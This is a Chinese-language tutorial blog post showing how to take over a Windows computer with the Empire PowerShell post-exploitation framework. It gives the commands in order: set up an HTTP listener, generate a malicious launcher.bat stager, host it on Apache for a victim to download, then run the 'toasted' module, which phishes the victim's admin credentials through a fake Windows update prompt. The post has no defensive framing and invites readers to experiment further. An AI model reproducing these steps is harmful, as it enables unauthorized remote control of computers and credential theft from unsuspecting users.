黑客如何通过一个bat文件控制整台计算机
作者:FancyPig | 发布时间: | 更新时间:
相关阅读
- 电脑远控
data-postsbox="{"id":17473,"title":"一个word文档引发的远控0day漏洞——follina","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5486,"comment_count":5,"category":"knowledge","is_forum_post":false}">{"id":17473,"title":"一个word文档引发的远控0day漏洞——follina","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5486,"comment_count":5,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":12044,"title":"如何通过一个exe文件远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4429,"comment_count":16,"category":"knowledge","is_forum_post":false}">{"id":12044,"title":"如何通过一个exe文件远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4429,"comment_count":16,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":8451,"title":"如何通过发送一个PDF文件 远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}">{"id":8451,"title":"如何通过发送一个PDF文件 远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}">{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}
- 移动设备远控
data-postsbox="{"id":11280,"title":"Metasploit框架远程控制入侵手机教程","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6128,"comment_count":296,"category":"knowledge","is_forum_post":false}">{"id":11280,"title":"Metasploit框架远程控制入侵手机教程","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6128,"comment_count":296,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}">{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21850,"comment_count":1000,"category":"sg","is_forum_post":false}">{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21850,"comment_count":1000,"category":"sg","is_forum_post":false}
视频讲解
之前我们分享过通过exe、pdf、word宏等文件方式远程控制计算机,今天我们带大家来了解Empire powershell后渗透框架,通过一个bat文件可以完成控制整台计算机……
图文讲解
本视频主要使用的是Empire powershell后渗透框架
安装Empire powershell框架
针对Kali linux(Debian内核)或者Ubuntu内核的Linux操作系统,需要输入下面的命令安装Empire powershell
如果是CentOs的则需要使用yum安装
sudo apt install powershell-empire
启动Empire powershell服务端
powershell-empire server
启动Empire powershell 客户端
powershell-empire client使用http相关模块
uselistener http
设置监听端口为4321
set Port 4321
运行
execute如果之前运行过会有相应的提示,我们则可以输入listeners进行展示
然后使用windows/launcher_bat模块
usestager windows/launcher_bat
设置为http监听
set Listener http之后运行
execute可以看到恶意的bat文件已经生成好了
使用apache服务托管恶意文件
之后启动apache服务
sudo systemctl start apache2.service然后将恶意bat文件拷入到apache的web服务路径下
sudo mv /var/lib/powershell-empire/empire/client/generated-stagers/launcher.bat /var/www/html/launcher.bat
热心网友下载并运行恶意文件
托管完成后,我们就可以引导用户去下载恶意文件了,这个是内网的IP地址,您需要根据自己的实际情况进行修改
然后保存好
您可以双击进行运行
然后你会发现很神奇的事情发生了,它消失了……
回到kali linux上,可以看到我们已经成功连上了
输入agents可以查看连接上的计算机的详细信息
然后我们使用powershell/collection/toasted模块
usemodule powershell/collection/toasted
然后进行参数的设置
set VerifyCreds TrueAgent需要填写我们这里获取到的Name
set Agent Z74L2PBU一切都设置好之后运行即可
execute
之后回到windows电脑,你会发现,这里有一个很有趣的弹窗
放大看,这里是提醒我们windows将在5分钟之后完成升级安装,如果我们点击重启
则会发现出现了一个windows内置的窗口
放大看,这里需要输入管理员账户和密码,才可以重启电脑……
这时,如果热心网友输入了自己的账户和密码
回到kali linux,我们可以看到通过钓鱼的方式,获取的账户和密码凭证
除此之外,视频中还演示了如何提权、如何打开远程桌面的操作,这里不再赘述,更多有趣的可以自行研究!